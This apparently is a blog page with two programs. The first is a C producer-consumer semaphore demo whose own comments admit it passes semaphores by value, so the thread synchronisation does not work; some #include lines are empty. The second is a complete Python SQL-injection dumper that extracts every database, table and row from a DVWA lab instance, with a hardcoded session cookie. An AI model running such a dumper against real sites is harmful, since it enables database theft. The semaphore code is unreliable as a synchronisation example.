进程同步(C代码)

说是进程同步,实际上写的是一个由信号量控制的多线程的程序,有限缓冲区的读写问题。

//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : buffer.h
//////////////////////////////////////////////////////////
#include <semaphore.h>
#ifndef _BUFFER_H
#define _BUFFER_H
 
#define BUFFER_SIZE 5 //number of slots in the bounded buffer
#define TRUE 1
#define FALSE 0
 
typedef struct
{   //bounded (ring) buffer shared between the producer and consumer threads
	int buffer[BUFFER_SIZE]; //storage slots; indices wrap modulo BUFFER_SIZE
	int read_i; //index of the next slot to read
	int write_i; //index of the next slot to write
	int count; //total number of items to process
	int written_c; //items written so far
	int read_c; //items read so far
}BUFFER;
 
typedef struct
{   //argument bundle for the thread functions (shared through the global `param`)
	BUFFER *pBUFFER; //the shared buffer
	sem_t mutex; //binary semaphore guarding the buffer (initialised to 1 in main)
	sem_t empty, full; //counting semaphores: free slots / filled slots
}PARAM;
 
//bufferfunc.c
//allocate and zero a BUFFER that expects `count` items in total
BUFFER * init_buffer(int count);
//NOTE(review): sem_t is passed by value below and in the callers. POSIX
//leaves copying a sem_t undefined, and each callee would operate on its
//own copy, so the semaphores would not actually be shared between
//threads; the parameters should become sem_t * (callers passing
//&param->mutex etc.). Kept as declared so the .c files still match.
//inserti: returns 1 after storing item, 0 once `count` items were written
int inserti(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full);
//removei: returns the item read, 0 once `count` items were read
//(an item whose value is 0 is indistinguishable from "done")
int removei(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full);
 
//procon.c
//pseudo-random integer used for item values and sleep durations
unsigned int getrand(unsigned int n);
//NOTE(review): pthread_create expects void *(*)(void *); these return int
int producer(void * param);
int consumer(void * param);
#endif
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : bufferfunc.c
//////////////////////////////////////////////////////////
#include 
#include 
#include "buffer.h"
 
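BUFFER * init_buffer(int count)
{   //allocate and initialise a BUFFER that expects `count` items in total.
	//Returns NULL when the allocation fails; the caller must check.
	BUFFER * pBUFFER = (BUFFER *)malloc(sizeof(BUFFER));
	if (pBUFFER == NULL) {
		return NULL;
	}

	//the original cleared only BUFFER_SIZE bytes; clear the whole slot array
	memset(pBUFFER->buffer, 0, sizeof(pBUFFER->buffer));
	pBUFFER->read_i = 0;
	pBUFFER->write_i = 0;
	pBUFFER->read_c = 0;
	pBUFFER->written_c = 0;
	pBUFFER->count = count;

	return pBUFFER;
}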
 
 
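int inserti(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full)
{   //store one item in the buffer.
	//Returns 1 after storing, 0 when `count` items have already been written.
	//NOTE(review): the semaphores arrive by value (see buffer.h); the
	//signature is kept, but the calls below only synchronise correctly
	//once they operate on the shared sem_t objects.
	sem_wait(&empty);
	sem_wait(&mutex);

	//critical section
	if (pBUFFER->written_c == pBUFFER->count) {
		//all work done: release the mutex and hand the slot token back so
		//any other producer blocked in sem_wait(&empty) wakes and exits too
		sem_post(&mutex);
		sem_post(&empty);
		return 0;
	}

	//read write_i under the mutex (the original read it before locking
	//and then wrote to an undeclared `buffer` instead of pBUFFER->buffer)
	pBUFFER->buffer[pBUFFER->write_i] = item;
	pBUFFER->write_i = (pBUFFER->write_i + 1) % BUFFER_SIZE;
	pBUFFER->written_c++;

	sem_post(&mutex);
	sem_post(&full);
	return 1;
}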
 
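int removei(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full)
{   //take one item out of the buffer.
	//Returns the item, or 0 once `count` items have been read. The `item`
	//parameter is only kept for the declared signature and is overwritten.
	//NOTE(review): an item whose value is 0 cannot be told apart from the
	//"done" return; a separate status value would remove the ambiguity.
	//NOTE(review): the semaphores arrive by value (see buffer.h).
	int done;

	sem_wait(&full);
	sem_wait(&mutex);

	//critical section
	if (pBUFFER->read_c == pBUFFER->count) {
		//all work done: release the mutex and hand the token on so any
		//other consumer blocked in sem_wait(&full) wakes and exits too
		sem_post(&mutex);
		sem_post(&full);
		return 0;
	}

	//read read_i under the mutex (the original read it before locking
	//and indexed an undeclared `buffer`; line 111 also lacked its ';')
	item = pBUFFER->buffer[pBUFFER->read_i];
	pBUFFER->read_i = (pBUFFER->read_i + 1) % BUFFER_SIZE;
	pBUFFER->read_c++;
	done = (pBUFFER->read_c == pBUFFER->count);

	sem_post(&mutex);
	sem_post(&empty);
	if (done) {
		//producers post `full` exactly `count` times, so without one extra
		//token the remaining consumers would block forever instead of
		//observing read_c == count
		sem_post(&full);
	}
	return item;
}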
 
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : procon.c
//////////////////////////////////////////////////////////
#include 
#include 
#include 
#include "buffer.h"
 
extern param;
 
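unsigned int getrand(unsigned int n)
{   //return a pseudo-random integer in 1..n, as the callers' comments
	//expect (the original returned 0..n, and 0 terminates a consumer).
	//Returns 0 only when n == 0.
	//The generator is seeded once per process: reseeding with time(0)
	//on every call gave every thread started within the same second the
	//same sequence. rand() is not thread-safe; fine for this demo only.
	static int seeded = 0;
	if (!seeded) {
		srand((unsigned int)time(NULL));
		seeded = 1;
	}
	if (n == 0) {
		return 0;
	}
	return (unsigned int)rand() % n + 1;
}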
 
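int producer(void * p)
{   //producer thread body: insert random items until inserti() reports
	//that `count` items have been written. Uses the PARAM passed by
	//pthread_create when non-NULL, otherwise the global `param`.
	//NOTE(review): pthread_create expects void *(*)(void *); the int
	//return type is kept to match the prototype in buffer.h.
	PARAM *prm = (p != NULL) ? (PARAM *)p : param;
	BUFFER *pBUFFER = prm->pBUFFER;
	sem_t mutex = prm->mutex; //NOTE(review): copies of sem_t, see buffer.h
	sem_t empty = prm->empty;
	sem_t full = prm->full;
	//pthread_t is opaque; the cast is only for printing (was stored in an int)
	unsigned long id = (unsigned long)pthread_self();
	int item;

	sleep(getrand(3)); //rest a random number of seconds before starting
	while (TRUE) {
		//a fresh item per iteration; the original drew one value and
		//inserted it repeatedly
		item = getrand(100);
		if (!inserti(item, pBUFFER, mutex, empty, full)) {
			break;
		}
		printf("Thread %lu product a %d\n", id, item);
	}
	return 0;
}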
 
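int consumer(void * p)
{   //consumer thread body: remove items until removei() reports that
	//`count` items have been read. Uses the PARAM passed by
	//pthread_create when non-NULL, otherwise the global `param`.
	//NOTE(review): pthread_create expects void *(*)(void *); the int
	//return type is kept to match the prototype in buffer.h.
	PARAM *prm = (p != NULL) ? (PARAM *)p : param;
	BUFFER *pBUFFER = prm->pBUFFER;
	sem_t mutex = prm->mutex; //NOTE(review): copies of sem_t, see buffer.h
	sem_t empty = prm->empty;
	sem_t full = prm->full;
	//pthread_t is opaque; the cast is only for printing (was `pthread id;`)
	unsigned long id = (unsigned long)pthread_self();
	int item = 0; //the original passed an uninitialised value into removei()

	sleep(getrand(5)); //rest a random number of seconds before starting
	while (TRUE) {
		item = removei(item, pBUFFER, mutex, empty, full);
		//removei() signals "done" with 0, so an item whose value is 0
		//also ends this consumer (see the note on removei)
		if (!item) {
			break;
		}
		printf("Thread %lu consume a %d\n", id, item);
	}
	return 0;
}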
 
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : main.c
//////////////////////////////////////////////////////////
#include 
#include 
#include 
#include 
#include "buffer.h"
 
PARAM *param; //全局参数结构
 
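//parse a strictly positive decimal integer; returns -1 on any error
//(the original used `int(argv[i])`, which is not C)
static long parse_positive(const char *s)
{
	char *end;
	long v;

	if (s == NULL || *s == '\0') {
		return -1;
	}
	v = strtol(s, &end, 10);
	if (*end != '\0' || v < 1) {
		return -1;
	}
	return v;
}

int main(int argc, char ** argv)
{   //usage: <count> <producer threads> <consumer threads>
	//Builds the shared PARAM/BUFFER, starts the threads and joins them.
	int i;
	long count; //number of items to produce and consume
	long pnum, cnum; //producer / consumer thread counts
	pthread_t *ptid; //producer thread ids (the original used a non-existent `pthread` type)
	pthread_t *ctid; //consumer thread ids
	pthread_attr_t attr;

	//argument checking
	if (argc != 4) {
		fprintf(stderr, "Param error!\n");
		return -1;
	}
	count = parse_positive(argv[1]);
	pnum = parse_positive(argv[2]);
	cnum = parse_positive(argv[3]);
	if (count < 0 || pnum < 0 || cnum < 0) {
		fprintf(stderr, "Value error!\n");
		return -2;
	}

	//initialisation; the original never allocated `param` and so
	//dereferenced a null pointer in sem_init
	param = (PARAM *)malloc(sizeof(PARAM));
	ptid = (pthread_t *)malloc((size_t)pnum * sizeof(pthread_t));
	ctid = (pthread_t *)malloc((size_t)cnum * sizeof(pthread_t));
	if (param == NULL || ptid == NULL || ctid == NULL) {
		fprintf(stderr, "Memory error!\n");
		return -3;
	}
	param->pBUFFER = init_buffer((int)count);
	if (param->pBUFFER == NULL) {
		fprintf(stderr, "Memory error!\n");
		return -3;
	}
	sem_init(&(param->mutex), 0, 1);
	sem_init(&(param->empty), 0, BUFFER_SIZE);
	sem_init(&(param->full), 0, 0);
	pthread_attr_init(&attr);

	//start the threads. `param` is passed as the thread argument as well
	//as being global. The cast is needed because the prototypes in
	//buffer.h return int while pthread_create expects void *(*)(void *).
	for (i = 0; i < pnum; i++) {
		if (pthread_create(&ptid[i], &attr, (void *(*)(void *))producer, param) != 0) {
			fprintf(stderr, "Thread error!\n");
			return -4;
		}
	}
	for (i = 0; i < cnum; i++) {
		if (pthread_create(&ctid[i], &attr, (void *(*)(void *))consumer, param) != 0) {
			fprintf(stderr, "Thread error!\n");
			return -4;
		}
	}

	//wait for all producers, then all consumers
	for (i = 0; i < pnum; i++) {
		pthread_join(ptid[i], NULL);
	}
	for (i = 0; i < cnum; i++) {
		pthread_join(ctid[i], NULL);
	}

	//release what was created above
	pthread_attr_destroy(&attr);
	sem_destroy(&(param->mutex));
	sem_destroy(&(param->empty));
	sem_destroy(&(param->full));
	free(param->pBUFFER);
	free(param);
	free(ptid);
	free(ctid);

	printf("All done!\n");
	return 0;
}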

DVWA SQL Injection脱裤脚本(python代码)

针对DVWA上low等级下有回显的SQL注入实验进行脱裤。medium等级只需把字符型改为数字型(把payload里1后面的单引号去掉)即可。

#coding=utf-8
'''
author : superfish
date : 2015/11/16
name : dvwasqli.py
'''
import urllib2
import urllib
import re
import sys
import binascii
import requests
 
# 字符串转CHAR(...)
def word2ascii(s):
	"""Render *s* as a MySQL ``CHAR(...)`` expression of its code points.

	``str`` of a tuple is used for the parenthesised list, so a single
	character yields ``CHAR(97,)`` and an empty string ``CHAR()``.
	"""
	codes = tuple(ord(ch) for ch in s)
	return 'CHAR' + str(codes)
 
# 取得查询结果
def getkey(payload, s):
	"""Send *payload* as the ``id`` parameter and return the text the page
	echoes between the ``^^^`` markers (``''`` when nothing comes back).

	If the marker pair is absent from the first response, the same query
	is re-issued wrapped in ``length(...)`` and then once per character
	with ``substr(...)``; that is how the script copes with the page
	truncating long values.  ``s`` is the ``requests.Session`` built below.
	The host is hard-coded.  ``pay.group(1)`` raises AttributeError when
	*payload* does not match ``UNION SELECT (.*),2 FROM``, and
	``newsee.group(1)`` in the per-character loop does the same if a
	reply lacks the markers.
	"""
	key = ''

	urlpayload = urllib.quote(payload)
	url = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % urlpayload

	# request
	c = s.get(url)
	cont = c.content

	# the value is bracketed by ^^^ on both sides; `.|\n` lets it span lines
	see = re.search(r"\^\^\^((.|\n)*)\^\^\^", cont)
	if see:
		# displayed length was sufficient and the result is not empty
		key = see.group(1)
	else:
		# result empty, or the page cut the value off before the closing marker
		pay = re.search(r"UNION SELECT (.*),2 FROM", payload)
		newpayload = payload.replace(pay.group(1), "length(%s)" % pay.group(1))
		newurlpayload = urllib.quote(newpayload)
		newurl = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % newurlpayload
		newc = s.get(newurl)
		newcont = newc.content
		newsee = re.search(r"\^\^\^((.|\n)*)\^\^\^", newcont)

		# empty result
		if newsee is None:
			key = ''

		# handle the truncated case
		else:
			# total length (ValueError if the echoed text is not numeric)
			lth = int(newsee.group(1))
			# one request per character; substr positions are 1-based
			for i in range(1, lth+1):
				newpayload = payload.replace(pay.group(1), "substr(%s,%d,1)" % (pay.group(1), i))
				newurlpayload = urllib.quote(newpayload)
				newurl = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % newurlpayload
				newc = s.get(newurl)
				newcont = newc.content
				newsee = re.search(r"\^\^\^((.|\n)*)\^\^\^", newcont)
				key += newsee.group(1)

	return key
 
# 存放数据库数据
# Driver: walks schemata -> tables -> columns -> rows with getkey() and
# writes the result to out.txt.  Written for Python 2 (urllib2, urllib.quote,
# print statements).  The file is opened without `with` and is only closed
# on the final line; the sys.exit() path below relies on interpreter shutdown.
f = open('out.txt','w')

databases = []
tables = []
columns = []

# browser-like headers for the lab host; the Cookie entry carries the
# security level and a session id, i.e. a credential kept in source
s = requests.Session()
s.headers.update({'Host':'10.206.6.10'})
s.headers.update({'Proxy-Connection':'keep-alive'})
s.headers.update({'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'})
s.headers.update({'Upgrade-Insecure-Requests':'1'})
s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36'})
s.headers.update({'Referer':'http://10.206.6.10/dvwa/vulnerabilities/sqli/'})
s.headers.update({'Accept-Encoding':'gzip, deflate, sdch'})
s.headers.update({'Accept-Language':'zh-CN,zh;q=0.8'})
s.headers.update({'Cookie':'security=low; PHPSESSID=4qc1tgj902k827t9fhtbc9pm22'})

# every result is wrapped in CHAR(94,94,94), i.e. ^^^, so getkey() can find it
# schema names
payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(schema_name),CHAR(94,94,94)),2 FROM information_schema.schemata#"
key = getkey(payload, s)
if key == '':
	print "error!"
	sys.exit(0)
databases = key.split(',')
print "Databases : "
print databases
print

# tables of each schema
for database in databases:

	# information_schema is skipped; nothing of interest there
	if database == "information_schema":
		continue

	f.write("Database %s : \n" % database)
	print "-- Database %s " % database

	# schema name is passed through word2ascii() so no quote characters are needed
	payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(table_name),CHAR(94,94,94)),2 FROM information_schema.tables WHERE table_schema=%s#" % word2ascii(database)
	key = getkey(payload, s)
	if key == '':
		f.write("Database %s have nothing\n\n" % database)
		continue
	else:
		tables = key.split(',')

	# columns of each table
	for table in tables:
		f.write("Table %s : \n" % table)
		print "  |-- Table %s " % table

		payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(column_name),CHAR(94,94,94)),2 FROM information_schema.columns WHERE table_schema=%s AND table_name=%s#" % (word2ascii(database),word2ascii(table))
		key = getkey(payload, s)
		if key == '':
			f.write("Table %s doesn't have any column\n" % table) # should not happen
			continue
		else:
			columns = key.split(',')
			f.write("||")
			for column in columns:
				f.write("%s|" % column)
			f.write("|\n")

		# row dump; columns are separated by | (CHAR(124)), rows by ||
		payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(CONCAT(CHAR(124,124)"
		for column in columns:
			payload += ",%s,CHAR(124)" % column
		tail = ",CHAR(124))),CHAR(94,94,94)),2 FROM %s.%s#" % (database, table)
		payload += tail
		key = getkey(payload, s)
		if key == '':
			f.write("Table %s have nothing\n" % table)
			continue
		else:
			# GROUP_CONCAT joins rows with ','; put each row on its own line
			dump = key.replace("||,||", "||\n||")
			f.write("%s" % dump)

		f.write("\n")

	print "[*] Database %s dumped!\n" % database

f.close()
print "Completed!"